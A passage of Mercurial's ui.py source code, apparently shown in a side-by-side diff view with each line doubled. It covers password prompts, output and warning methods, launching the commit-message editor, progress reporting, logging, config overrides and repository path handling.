1656 # TODO: shouldn't it be a warning?
1656 # TODO: shouldn't it be a warning?
1657 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1657 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1658
1658
1659 def getpass(self, prompt=None, default=None):
1659 def getpass(self, prompt=None, default=None):
1660 if not self.interactive():
1660 if not self.interactive():
1661 return default
1661 return default
1662 try:
1662 try:
1663 self._writemsg(
1663 self._writemsg(
1664 self._fmsgerr,
1664 self._fmsgerr,
1665 prompt or _(b'password: '),
1665 prompt or _(b'password: '),
1666 type=b'prompt',
1666 type=b'prompt',
1667 password=True,
1667 password=True,
1668 )
1668 )
1669 # disable getpass() only if explicitly specified. it's still valid
1669 # disable getpass() only if explicitly specified. it's still valid
1670 # to interact with tty even if fin is not a tty.
1670 # to interact with tty even if fin is not a tty.
1671 with self.timeblockedsection(b'stdio'):
1671 with self.timeblockedsection(b'stdio'):
1672 if self.configbool(b'ui', b'nontty'):
1672 if self.configbool(b'ui', b'nontty'):
1673 l = self._fin.readline()
1673 l = self._fin.readline()
1674 if not l:
1674 if not l:
1675 raise EOFError
1675 raise EOFError
1676 return l.rstrip(b'\n')
1676 return l.rstrip(b'\n')
1677 else:
1677 else:
1678 return getpass.getpass('')
1678 return getpass.getpass('')
1679 except EOFError:
1679 except EOFError:
1680 raise error.ResponseExpected()
1680 raise error.ResponseExpected()
1681
1681
1682 def status(self, *msg, **opts):
1682 def status(self, *msg, **opts):
1683 '''write status message to output (if ui.quiet is False)
1683 '''write status message to output (if ui.quiet is False)
1684
1684
1685 This adds an output label of "ui.status".
1685 This adds an output label of "ui.status".
1686 '''
1686 '''
1687 if not self.quiet:
1687 if not self.quiet:
1688 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1688 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1689
1689
1690 def warn(self, *msg, **opts):
1690 def warn(self, *msg, **opts):
1691 '''write warning message to output (stderr)
1691 '''write warning message to output (stderr)
1692
1692
1693 This adds an output label of "ui.warning".
1693 This adds an output label of "ui.warning".
1694 '''
1694 '''
1695 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1695 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1696
1696
1697 def error(self, *msg, **opts):
1697 def error(self, *msg, **opts):
1698 '''write error message to output (stderr)
1698 '''write error message to output (stderr)
1699
1699
1700 This adds an output label of "ui.error".
1700 This adds an output label of "ui.error".
1701 '''
1701 '''
1702 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1702 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1703
1703
1704 def note(self, *msg, **opts):
1704 def note(self, *msg, **opts):
1705 '''write note to output (if ui.verbose is True)
1705 '''write note to output (if ui.verbose is True)
1706
1706
1707 This adds an output label of "ui.note".
1707 This adds an output label of "ui.note".
1708 '''
1708 '''
1709 if self.verbose:
1709 if self.verbose:
1710 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1710 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1711
1711
1712 def debug(self, *msg, **opts):
1712 def debug(self, *msg, **opts):
1713 '''write debug message to output (if ui.debugflag is True)
1713 '''write debug message to output (if ui.debugflag is True)
1714
1714
1715 This adds an output label of "ui.debug".
1715 This adds an output label of "ui.debug".
1716 '''
1716 '''
1717 if self.debugflag:
1717 if self.debugflag:
1718 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1718 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1719 self.log(b'debug', b'%s', b''.join(msg))
1719 self.log(b'debug', b'%s', b''.join(msg))
1720
1720
1721 # Aliases to defeat check-code.
1721 # Aliases to defeat check-code.
1722 statusnoi18n = status
1722 statusnoi18n = status
1723 notenoi18n = note
1723 notenoi18n = note
1724 warnnoi18n = warn
1724 warnnoi18n = warn
1725 writenoi18n = write
1725 writenoi18n = write
1726
1726
1727 def edit(
1727 def edit(
1728 self,
1728 self,
1729 text,
1729 text,
1730 user,
1730 user,
1731 extra=None,
1731 extra=None,
1732 editform=None,
1732 editform=None,
1733 pending=None,
1733 pending=None,
1734 repopath=None,
1734 repopath=None,
1735 action=None,
1735 action=None,
1736 ):
1736 ):
1737 if action is None:
1737 if action is None:
1738 self.develwarn(
1738 self.develwarn(
1739 b'action is None but will soon be a required '
1739 b'action is None but will soon be a required '
1740 b'parameter to ui.edit()'
1740 b'parameter to ui.edit()'
1741 )
1741 )
1742 extra_defaults = {
1742 extra_defaults = {
1743 b'prefix': b'editor',
1743 b'prefix': b'editor',
1744 b'suffix': b'.txt',
1744 b'suffix': b'.txt',
1745 }
1745 }
1746 if extra is not None:
1746 if extra is not None:
1747 if extra.get(b'suffix') is not None:
1747 if extra.get(b'suffix') is not None:
1748 self.develwarn(
1748 self.develwarn(
1749 b'extra.suffix is not None but will soon be '
1749 b'extra.suffix is not None but will soon be '
1750 b'ignored by ui.edit()'
1750 b'ignored by ui.edit()'
1751 )
1751 )
1752 extra_defaults.update(extra)
1752 extra_defaults.update(extra)
1753 extra = extra_defaults
1753 extra = extra_defaults
1754
1754
1755 if action == b'diff':
1755 if action == b'diff':
1756 suffix = b'.diff'
1756 suffix = b'.diff'
1757 elif action:
1757 elif action:
1758 suffix = b'.%s.hg.txt' % action
1758 suffix = b'.%s.hg.txt' % action
1759 else:
1759 else:
1760 suffix = extra[b'suffix']
1760 suffix = extra[b'suffix']
1761
1761
1762 rdir = None
1762 rdir = None
1763 if self.configbool(b'experimental', b'editortmpinhg'):
1763 if self.configbool(b'experimental', b'editortmpinhg'):
1764 rdir = repopath
1764 rdir = repopath
1765 (fd, name) = pycompat.mkstemp(
1765 (fd, name) = pycompat.mkstemp(
1766 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1766 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1767 )
1767 )
1768 try:
1768 try:
1769 with os.fdopen(fd, 'wb') as f:
1769 with os.fdopen(fd, 'wb') as f:
1770 f.write(util.tonativeeol(text))
1770 f.write(util.tonativeeol(text))
1771
1771
1772 environ = {b'HGUSER': user}
1772 environ = {b'HGUSER': user}
1773 if b'transplant_source' in extra:
1773 if b'transplant_source' in extra:
1774 environ.update(
1774 environ.update(
1775 {b'HGREVISION': hex(extra[b'transplant_source'])}
1775 {b'HGREVISION': hex(extra[b'transplant_source'])}
1776 )
1776 )
1777 for label in (b'intermediate-source', b'source', b'rebase_source'):
1777 for label in (b'intermediate-source', b'source', b'rebase_source'):
1778 if label in extra:
1778 if label in extra:
1779 environ.update({b'HGREVISION': extra[label]})
1779 environ.update({b'HGREVISION': extra[label]})
1780 break
1780 break
1781 if editform:
1781 if editform:
1782 environ.update({b'HGEDITFORM': editform})
1782 environ.update({b'HGEDITFORM': editform})
1783 if pending:
1783 if pending:
1784 environ.update({b'HG_PENDING': pending})
1784 environ.update({b'HG_PENDING': pending})
1785
1785
1786 editor = self.geteditor()
1786 editor = self.geteditor()
1787
1787
1788 self.system(
1788 self.system(
1789 b"%s \"%s\"" % (editor, name),
1789 b"%s \"%s\"" % (editor, name),
1790 environ=environ,
1790 environ=environ,
1791 onerr=error.Abort,
1791 onerr=error.Abort,
1792 errprefix=_(b"edit failed"),
1792 errprefix=_(b"edit failed"),
1793 blockedtag=b'editor',
1793 blockedtag=b'editor',
1794 )
1794 )
1795
1795
1796 with open(name, 'rb') as f:
1796 with open(name, 'rb') as f:
1797 t = util.fromnativeeol(f.read())
1797 t = util.fromnativeeol(f.read())
1798 finally:
1798 finally:
1799 os.unlink(name)
1799 os.unlink(name)
1800
1800
1801 return t
1801 return t
1802
1802
1803 def system(
1803 def system(
1804 self,
1804 self,
1805 cmd,
1805 cmd,
1806 environ=None,
1806 environ=None,
1807 cwd=None,
1807 cwd=None,
1808 onerr=None,
1808 onerr=None,
1809 errprefix=None,
1809 errprefix=None,
1810 blockedtag=None,
1810 blockedtag=None,
1811 ):
1811 ):
1812 '''execute shell command with appropriate output stream. command
1812 '''execute shell command with appropriate output stream. command
1813 output will be redirected if fout is not stdout.
1813 output will be redirected if fout is not stdout.
1814
1814
1815 if command fails and onerr is None, return status, else raise onerr
1815 if command fails and onerr is None, return status, else raise onerr
1816 object as exception.
1816 object as exception.
1817 '''
1817 '''
1818 if blockedtag is None:
1818 if blockedtag is None:
1819 # Long cmds tend to be because of an absolute path on cmd. Keep
1819 # Long cmds tend to be because of an absolute path on cmd. Keep
1820 # the tail end instead
1820 # the tail end instead
1821 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1821 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1822 blockedtag = b'unknown_system_' + cmdsuffix
1822 blockedtag = b'unknown_system_' + cmdsuffix
1823 out = self._fout
1823 out = self._fout
1824 if any(s[1] for s in self._bufferstates):
1824 if any(s[1] for s in self._bufferstates):
1825 out = self
1825 out = self
1826 with self.timeblockedsection(blockedtag):
1826 with self.timeblockedsection(blockedtag):
1827 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1827 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1828 if rc and onerr:
1828 if rc and onerr:
1829 errmsg = b'%s %s' % (
1829 errmsg = b'%s %s' % (
1830 os.path.basename(cmd.split(None, 1)[0]),
1830 os.path.basename(cmd.split(None, 1)[0]),
1831 procutil.explainexit(rc),
1831 procutil.explainexit(rc),
1832 )
1832 )
1833 if errprefix:
1833 if errprefix:
1834 errmsg = b'%s: %s' % (errprefix, errmsg)
1834 errmsg = b'%s: %s' % (errprefix, errmsg)
1835 raise onerr(errmsg)
1835 raise onerr(errmsg)
1836 return rc
1836 return rc
1837
1837
1838 def _runsystem(self, cmd, environ, cwd, out):
1838 def _runsystem(self, cmd, environ, cwd, out):
1839 """actually execute the given shell command (can be overridden by
1839 """actually execute the given shell command (can be overridden by
1840 extensions like chg)"""
1840 extensions like chg)"""
1841 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1841 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1842
1842
1843 def traceback(self, exc=None, force=False):
1843 def traceback(self, exc=None, force=False):
1844 '''print exception traceback if traceback printing enabled or forced.
1844 '''print exception traceback if traceback printing enabled or forced.
1845 only to call in exception handler. returns true if traceback
1845 only to call in exception handler. returns true if traceback
1846 printed.'''
1846 printed.'''
1847 if self.tracebackflag or force:
1847 if self.tracebackflag or force:
1848 if exc is None:
1848 if exc is None:
1849 exc = sys.exc_info()
1849 exc = sys.exc_info()
1850 cause = getattr(exc[1], 'cause', None)
1850 cause = getattr(exc[1], 'cause', None)
1851
1851
1852 if cause is not None:
1852 if cause is not None:
1853 causetb = traceback.format_tb(cause[2])
1853 causetb = traceback.format_tb(cause[2])
1854 exctb = traceback.format_tb(exc[2])
1854 exctb = traceback.format_tb(exc[2])
1855 exconly = traceback.format_exception_only(cause[0], cause[1])
1855 exconly = traceback.format_exception_only(cause[0], cause[1])
1856
1856
1857 # exclude frame where 'exc' was chained and rethrown from exctb
1857 # exclude frame where 'exc' was chained and rethrown from exctb
1858 self.write_err(
1858 self.write_err(
1859 b'Traceback (most recent call last):\n',
1859 b'Traceback (most recent call last):\n',
1860 encoding.strtolocal(''.join(exctb[:-1])),
1860 encoding.strtolocal(''.join(exctb[:-1])),
1861 encoding.strtolocal(''.join(causetb)),
1861 encoding.strtolocal(''.join(causetb)),
1862 encoding.strtolocal(''.join(exconly)),
1862 encoding.strtolocal(''.join(exconly)),
1863 )
1863 )
1864 else:
1864 else:
1865 output = traceback.format_exception(exc[0], exc[1], exc[2])
1865 output = traceback.format_exception(exc[0], exc[1], exc[2])
1866 self.write_err(encoding.strtolocal(''.join(output)))
1866 self.write_err(encoding.strtolocal(''.join(output)))
1867 return self.tracebackflag or force
1867 return self.tracebackflag or force
1868
1868
1869 def geteditor(self):
1869 def geteditor(self):
1870 '''return editor to use'''
1870 '''return editor to use'''
1871 if pycompat.sysplatform == b'plan9':
1871 if pycompat.sysplatform == b'plan9':
1872 # vi is the MIPS instruction simulator on Plan 9. We
1872 # vi is the MIPS instruction simulator on Plan 9. We
1873 # instead default to E to plumb commit messages to
1873 # instead default to E to plumb commit messages to
1874 # avoid confusion.
1874 # avoid confusion.
1875 editor = b'E'
1875 editor = b'E'
1876 else:
1876 else:
1877 editor = b'vi'
1877 editor = b'vi'
1878 return encoding.environ.get(b"HGEDITOR") or self.config(
1878 return encoding.environ.get(b"HGEDITOR") or self.config(
1879 b"ui", b"editor", editor
1879 b"ui", b"editor", editor
1880 )
1880 )
1881
1881
1882 @util.propertycache
1882 @util.propertycache
1883 def _progbar(self):
1883 def _progbar(self):
1884 """setup the progbar singleton to the ui object"""
1884 """setup the progbar singleton to the ui object"""
1885 if (
1885 if (
1886 self.quiet
1886 self.quiet
1887 or self.debugflag
1887 or self.debugflag
1888 or self.configbool(b'progress', b'disable')
1888 or self.configbool(b'progress', b'disable')
1889 or not progress.shouldprint(self)
1889 or not progress.shouldprint(self)
1890 ):
1890 ):
1891 return None
1891 return None
1892 return getprogbar(self)
1892 return getprogbar(self)
1893
1893
1894 def _progclear(self):
1894 def _progclear(self):
1895 """clear progress bar output if any. use it before any output"""
1895 """clear progress bar output if any. use it before any output"""
1896 if not haveprogbar(): # nothing loaded yet
1896 if not haveprogbar(): # nothing loaded yet
1897 return
1897 return
1898 if self._progbar is not None and self._progbar.printed:
1898 if self._progbar is not None and self._progbar.printed:
1899 self._progbar.clear()
1899 self._progbar.clear()
1900
1900
1901 def progress(self, topic, pos, item=b"", unit=b"", total=None):
1901 def progress(self, topic, pos, item=b"", unit=b"", total=None):
1902 '''show a progress message
1902 '''show a progress message
1903
1903
1904 By default a textual progress bar will be displayed if an operation
1904 By default a textual progress bar will be displayed if an operation
1905 takes too long. 'topic' is the current operation, 'item' is a
1905 takes too long. 'topic' is the current operation, 'item' is a
1906 non-numeric marker of the current position (i.e. the currently
1906 non-numeric marker of the current position (i.e. the currently
1907 in-process file), 'pos' is the current numeric position (i.e.
1907 in-process file), 'pos' is the current numeric position (i.e.
1908 revision, bytes, etc.), unit is a corresponding unit label,
1908 revision, bytes, etc.), unit is a corresponding unit label,
1909 and total is the highest expected pos.
1909 and total is the highest expected pos.
1910
1910
1911 Multiple nested topics may be active at a time.
1911 Multiple nested topics may be active at a time.
1912
1912
1913 All topics should be marked closed by setting pos to None at
1913 All topics should be marked closed by setting pos to None at
1914 termination.
1914 termination.
1915 '''
1915 '''
1916 self.deprecwarn(
1916 self.deprecwarn(
1917 b"use ui.makeprogress() instead of ui.progress()", b"5.1"
1917 b"use ui.makeprogress() instead of ui.progress()", b"5.1"
1918 )
1918 )
1919 progress = self.makeprogress(topic, unit, total)
1919 progress = self.makeprogress(topic, unit, total)
1920 if pos is not None:
1920 if pos is not None:
1921 progress.update(pos, item=item)
1921 progress.update(pos, item=item)
1922 else:
1922 else:
1923 progress.complete()
1923 progress.complete()
1924
1924
1925 def makeprogress(self, topic, unit=b"", total=None):
1925 def makeprogress(self, topic, unit=b"", total=None):
1926 """Create a progress helper for the specified topic"""
1926 """Create a progress helper for the specified topic"""
1927 if getattr(self._fmsgerr, 'structured', False):
1927 if getattr(self._fmsgerr, 'structured', False):
1928 # channel for machine-readable output with metadata, just send
1928 # channel for machine-readable output with metadata, just send
1929 # raw information
1929 # raw information
1930 # TODO: consider porting some useful information (e.g. estimated
1930 # TODO: consider porting some useful information (e.g. estimated
1931 # time) from progbar. we might want to support update delay to
1931 # time) from progbar. we might want to support update delay to
1932 # reduce the cost of transferring progress messages.
1932 # reduce the cost of transferring progress messages.
1933 def updatebar(topic, pos, item, unit, total):
1933 def updatebar(topic, pos, item, unit, total):
1934 self._fmsgerr.write(
1934 self._fmsgerr.write(
1935 None,
1935 None,
1936 type=b'progress',
1936 type=b'progress',
1937 topic=topic,
1937 topic=topic,
1938 pos=pos,
1938 pos=pos,
1939 item=item,
1939 item=item,
1940 unit=unit,
1940 unit=unit,
1941 total=total,
1941 total=total,
1942 )
1942 )
1943
1943
1944 elif self._progbar is not None:
1944 elif self._progbar is not None:
1945 updatebar = self._progbar.progress
1945 updatebar = self._progbar.progress
1946 else:
1946 else:
1947
1947
1948 def updatebar(topic, pos, item, unit, total):
1948 def updatebar(topic, pos, item, unit, total):
1949 pass
1949 pass
1950
1950
1951 return scmutil.progress(self, updatebar, topic, unit, total)
1951 return scmutil.progress(self, updatebar, topic, unit, total)
1952
1952
1953 def getlogger(self, name):
1953 def getlogger(self, name):
1954 """Returns a logger of the given name; or None if not registered"""
1954 """Returns a logger of the given name; or None if not registered"""
1955 return self._loggers.get(name)
1955 return self._loggers.get(name)
1956
1956
1957 def setlogger(self, name, logger):
1957 def setlogger(self, name, logger):
1958 """Install logger which can be identified later by the given name
1958 """Install logger which can be identified later by the given name
1959
1959
1960 More than one loggers can be registered. Use extension or module
1960 More than one loggers can be registered. Use extension or module
1961 name to uniquely identify the logger instance.
1961 name to uniquely identify the logger instance.
1962 """
1962 """
1963 self._loggers[name] = logger
1963 self._loggers[name] = logger
1964
1964
1965 def log(self, event, msgfmt, *msgargs, **opts):
1965 def log(self, event, msgfmt, *msgargs, **opts):
1966 '''hook for logging facility extensions
1966 '''hook for logging facility extensions
1967
1967
1968 event should be a readily-identifiable subsystem, which will
1968 event should be a readily-identifiable subsystem, which will
1969 allow filtering.
1969 allow filtering.
1970
1970
1971 msgfmt should be a newline-terminated format string to log, and
1971 msgfmt should be a newline-terminated format string to log, and
1972 *msgargs are %-formatted into it.
1972 *msgargs are %-formatted into it.
1973
1973
1974 **opts currently has no defined meanings.
1974 **opts currently has no defined meanings.
1975 '''
1975 '''
1976 if not self._loggers:
1976 if not self._loggers:
1977 return
1977 return
1978 activeloggers = [
1978 activeloggers = [
1979 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
1979 l for l in pycompat.itervalues(self._loggers) if l.tracked(event)
1980 ]
1980 ]
1981 if not activeloggers:
1981 if not activeloggers:
1982 return
1982 return
1983 msg = msgfmt % msgargs
1983 msg = msgfmt % msgargs
1984 opts = pycompat.byteskwargs(opts)
1984 opts = pycompat.byteskwargs(opts)
1985 # guard against recursion from e.g. ui.debug()
1985 # guard against recursion from e.g. ui.debug()
1986 registeredloggers = self._loggers
1986 registeredloggers = self._loggers
1987 self._loggers = {}
1987 self._loggers = {}
1988 try:
1988 try:
1989 for logger in activeloggers:
1989 for logger in activeloggers:
1990 logger.log(self, event, msg, opts)
1990 logger.log(self, event, msg, opts)
1991 finally:
1991 finally:
1992 self._loggers = registeredloggers
1992 self._loggers = registeredloggers
1993
1993
1994 def label(self, msg, label):
1994 def label(self, msg, label):
1995 '''style msg based on supplied label
1995 '''style msg based on supplied label
1996
1996
1997 If some color mode is enabled, this will add the necessary control
1997 If some color mode is enabled, this will add the necessary control
1998 characters to apply such color. In addition, 'debug' color mode adds
1998 characters to apply such color. In addition, 'debug' color mode adds
1999 markup showing which label affects a piece of text.
1999 markup showing which label affects a piece of text.
2000
2000
2001 ui.write(s, 'label') is equivalent to
2001 ui.write(s, 'label') is equivalent to
2002 ui.write(ui.label(s, 'label')).
2002 ui.write(ui.label(s, 'label')).
2003 '''
2003 '''
2004 if self._colormode is not None:
2004 if self._colormode is not None:
2005 return color.colorlabel(self, msg, label)
2005 return color.colorlabel(self, msg, label)
2006 return msg
2006 return msg
2007
2007
2008 def develwarn(self, msg, stacklevel=1, config=None):
2008 def develwarn(self, msg, stacklevel=1, config=None):
2009 """issue a developer warning message
2009 """issue a developer warning message
2010
2010
2011 Use 'stacklevel' to report the offender some layers further up in the
2011 Use 'stacklevel' to report the offender some layers further up in the
2012 stack.
2012 stack.
2013 """
2013 """
2014 if not self.configbool(b'devel', b'all-warnings'):
2014 if not self.configbool(b'devel', b'all-warnings'):
2015 if config is None or not self.configbool(b'devel', config):
2015 if config is None or not self.configbool(b'devel', config):
2016 return
2016 return
2017 msg = b'devel-warn: ' + msg
2017 msg = b'devel-warn: ' + msg
2018 stacklevel += 1 # get in develwarn
2018 stacklevel += 1 # get in develwarn
2019 if self.tracebackflag:
2019 if self.tracebackflag:
2020 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2020 util.debugstacktrace(msg, stacklevel, self._ferr, self._fout)
2021 self.log(
2021 self.log(
2022 b'develwarn',
2022 b'develwarn',
2023 b'%s at:\n%s'
2023 b'%s at:\n%s'
2024 % (msg, b''.join(util.getstackframes(stacklevel))),
2024 % (msg, b''.join(util.getstackframes(stacklevel))),
2025 )
2025 )
2026 else:
2026 else:
2027 curframe = inspect.currentframe()
2027 curframe = inspect.currentframe()
2028 calframe = inspect.getouterframes(curframe, 2)
2028 calframe = inspect.getouterframes(curframe, 2)
2029 fname, lineno, fmsg = calframe[stacklevel][1:4]
2029 fname, lineno, fmsg = calframe[stacklevel][1:4]
2030 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2030 fname, fmsg = pycompat.sysbytes(fname), pycompat.sysbytes(fmsg)
2031 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2031 self.write_err(b'%s at: %s:%d (%s)\n' % (msg, fname, lineno, fmsg))
2032 self.log(
2032 self.log(
2033 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2033 b'develwarn', b'%s at: %s:%d (%s)\n', msg, fname, lineno, fmsg
2034 )
2034 )
2035
2035
2036 # avoid cycles
2036 # avoid cycles
2037 del curframe
2037 del curframe
2038 del calframe
2038 del calframe
2039
2039
2040 def deprecwarn(self, msg, version, stacklevel=2):
2040 def deprecwarn(self, msg, version, stacklevel=2):
2041 """issue a deprecation warning
2041 """issue a deprecation warning
2042
2042
2043 - msg: message explaining what is deprecated and how to upgrade,
2043 - msg: message explaining what is deprecated and how to upgrade,
2044 - version: last version where the API will be supported,
2044 - version: last version where the API will be supported,
2045 """
2045 """
2046 if not (
2046 if not (
2047 self.configbool(b'devel', b'all-warnings')
2047 self.configbool(b'devel', b'all-warnings')
2048 or self.configbool(b'devel', b'deprec-warn')
2048 or self.configbool(b'devel', b'deprec-warn')
2049 ):
2049 ):
2050 return
2050 return
2051 msg += (
2051 msg += (
2052 b"\n(compatibility will be dropped after Mercurial-%s,"
2052 b"\n(compatibility will be dropped after Mercurial-%s,"
2053 b" update your code.)"
2053 b" update your code.)"
2054 ) % version
2054 ) % version
2055 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2055 self.develwarn(msg, stacklevel=stacklevel, config=b'deprec-warn')
2056
2056
2057 def exportableenviron(self):
2057 def exportableenviron(self):
2058 """The environment variables that are safe to export, e.g. through
2058 """The environment variables that are safe to export, e.g. through
2059 hgweb.
2059 hgweb.
2060 """
2060 """
2061 return self._exportableenviron
2061 return self._exportableenviron
2062
2062
2063 @contextlib.contextmanager
2063 @contextlib.contextmanager
2064 def configoverride(self, overrides, source=b""):
2064 def configoverride(self, overrides, source=b""):
2065 """Context manager for temporary config overrides
2065 """Context manager for temporary config overrides
2066 `overrides` must be a dict of the following structure:
2066 `overrides` must be a dict of the following structure:
2067 {(section, name) : value}"""
2067 {(section, name) : value}"""
2068 backups = {}
2068 backups = {}
2069 try:
2069 try:
2070 for (section, name), value in overrides.items():
2070 for (section, name), value in overrides.items():
2071 backups[(section, name)] = self.backupconfig(section, name)
2071 backups[(section, name)] = self.backupconfig(section, name)
2072 self.setconfig(section, name, value, source)
2072 self.setconfig(section, name, value, source)
2073 yield
2073 yield
2074 finally:
2074 finally:
2075 for __, backup in backups.items():
2075 for __, backup in backups.items():
2076 self.restoreconfig(backup)
2076 self.restoreconfig(backup)
2077 # just restoring ui.quiet config to the previous value is not enough
2077 # just restoring ui.quiet config to the previous value is not enough
2078 # as it does not update ui.quiet class member
2078 # as it does not update ui.quiet class member
2079 if (b'ui', b'quiet') in overrides:
2079 if (b'ui', b'quiet') in overrides:
2080 self.fixconfig(section=b'ui')
2080 self.fixconfig(section=b'ui')
2081
2081
2082
2082
2083 class paths(dict):
2083 class paths(dict):
2084 """Represents a collection of paths and their configs.
2084 """Represents a collection of paths and their configs.
2085
2085
2086 Data is initially derived from ui instances and the config files they have
2086 Data is initially derived from ui instances and the config files they have
2087 loaded.
2087 loaded.
2088 """
2088 """
2089
2089
2090 def __init__(self, ui):
2090 def __init__(self, ui):
2091 dict.__init__(self)
2091 dict.__init__(self)
2092
2092
2093 for name, loc in ui.configitems(b'paths', ignoresub=True):
2093 for name, loc in ui.configitems(b'paths', ignoresub=True):
2094 # No location is the same as not existing.
2094 # No location is the same as not existing.
2095 if not loc:
2095 if not loc:
2096 continue
2096 continue
2097 loc, sub = ui.configsuboptions(b'paths', name)
2097 loc, sub = ui.configsuboptions(b'paths', name)
2098 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
2098 self[name] = path(ui, name, rawloc=loc, suboptions=sub)
2099
2099
2100 def getpath(self, name, default=None):
2100 def getpath(self, name, default=None):
2101 """Return a ``path`` from a string, falling back to default.
2101 """Return a ``path`` from a string, falling back to default.
2102
2102
2103 ``name`` can be a named path or locations. Locations are filesystem
2103 ``name`` can be a named path or locations. Locations are filesystem
2104 paths or URIs.
2104 paths or URIs.
2105
2105
2106 Returns None if ``name`` is not a registered path, a URI, or a local
2106 Returns None if ``name`` is not a registered path, a URI, or a local
2107 path to a repo.
2107 path to a repo.
2108 """
2108 """
2109 # Only fall back to default if no path was requested.
2109 # Only fall back to default if no path was requested.
2110 if name is None:
2110 if name is None:
2111 if not default:
2111 if not default:
2112 default = ()
2112 default = ()
2113 elif not isinstance(default, (tuple, list)):
2113 elif not isinstance(default, (tuple, list)):
2114 default = (default,)
2114 default = (default,)
2115 for k in default:
2115 for k in default:
2116 try:
2116 try:
2117 return self[k]
2117 return self[k]
2118 except KeyError:
2118 except KeyError:
2119 continue
2119 continue
2120 return None
2120 return None
2121
2121
2122 # Most likely empty string.
2122 # Most likely empty string.
2123 # This may need to raise in the future.
2123 # This may need to raise in the future.
2124 if not name:
2124 if not name:
2125 return None
2125 return None
2126
2126
2127 try:
2127 try:
2128 return self[name]
2128 return self[name]
2129 except KeyError:
2129 except KeyError:
2130 # Try to resolve as a local path or URI.
2130 # Try to resolve as a local path or URI.
2131 try:
2131 try:
2132 # We don't pass sub-options in, so no need to pass ui instance.
2132 # We don't pass sub-options in, so no need to pass ui instance.
2133 return path(None, None, rawloc=name)
2133 return path(None, None, rawloc=name)
2134 except ValueError:
2134 except ValueError:
2135 raise error.RepoError(_(b'repository %s does not exist') % name)
2135 raise error.RepoError(_(b'repository %s does not exist') % name)
2136
2136
2137
2137
2138 _pathsuboptions = {}
2138 _pathsuboptions = {}
2139
2139
2140
2140
2141 def pathsuboption(option, attr):
2141 def pathsuboption(option, attr):
2142 """Decorator used to declare a path sub-option.
2142 """Decorator used to declare a path sub-option.
2143
2143
2144 Arguments are the sub-option name and the attribute it should set on
2144 Arguments are the sub-option name and the attribute it should set on
2145 ``path`` instances.
2145 ``path`` instances.
2146
2146
2147 The decorated function will receive as arguments a ``ui`` instance,
2147 The decorated function will receive as arguments a ``ui`` instance,
2148 ``path`` instance, and the string value of this option from the config.
2148 ``path`` instance, and the string value of this option from the config.
2149 The function should return the value that will be set on the ``path``
2149 The function should return the value that will be set on the ``path``
2150 instance.
2150 instance.
2151
2151
2152 This decorator can be used to perform additional verification of
2152 This decorator can be used to perform additional verification of
2153 sub-options and to change the type of sub-options.
2153 sub-options and to change the type of sub-options.
2154 """
2154 """
2155
2155
2156 def register(func):
2156 def register(func):
2157 _pathsuboptions[option] = (attr, func)
2157 _pathsuboptions[option] = (attr, func)
2158 return func
2158 return func
2159
2159
2160 return register
2160 return register
2161
2161
2162
2162
2163 @pathsuboption(b'pushurl', b'pushloc')
2163 @pathsuboption(b'pushurl', b'pushloc')
2164 def pushurlpathoption(ui, path, value):
2164 def pushurlpathoption(ui, path, value):
2165 u = util.url(value)
2165 u = util.url(value)
2166 # Actually require a URL.
2166 # Actually require a URL.
2167 if not u.scheme:
2167 if not u.scheme:
2168 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2168 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
2169 return None
2169 return None
2170
2170
2171 # Don't support the #foo syntax in the push URL to declare branch to
2171 # Don't support the #foo syntax in the push URL to declare branch to
2172 # push.
2172 # push.
2173 if u.fragment:
2173 if u.fragment:
2174 ui.warn(
2174 ui.warn(
2175 _(
2175 _(
2176 b'("#fragment" in paths.%s:pushurl not supported; '
2176 b'("#fragment" in paths.%s:pushurl not supported; '
2177 b'ignoring)\n'
2177 b'ignoring)\n'
2178 )
2178 )
2179 % path.name
2179 % path.name
2180 )
2180 )
2181 u.fragment = None
2181 u.fragment = None
2182
2182
2183 return bytes(u)
2183 return bytes(u)
2184
2184
2185
2185
2186 @pathsuboption(b'pushrev', b'pushrev')
2186 @pathsuboption(b'pushrev', b'pushrev')
2187 def pushrevpathoption(ui, path, value):
2187 def pushrevpathoption(ui, path, value):
2188 return value
2188 return value
2189
2189
2190
2190
2191 class path(object):
2191 class path(object):
2192 """Represents an individual path and its configuration."""
2192 """Represents an individual path and its configuration."""
2193
2193
2194 def __init__(self, ui, name, rawloc=None, suboptions=None):
2194 def __init__(self, ui, name, rawloc=None, suboptions=None):
2195 """Construct a path from its config options.
2195 """Construct a path from its config options.
2196
2196
2197 ``ui`` is the ``ui`` instance the path is coming from.
2197 ``ui`` is the ``ui`` instance the path is coming from.
2198 ``name`` is the symbolic name of the path.
2198 ``name`` is the symbolic name of the path.
2199 ``rawloc`` is the raw location, as defined in the config.
2199 ``rawloc`` is the raw location, as defined in the config.
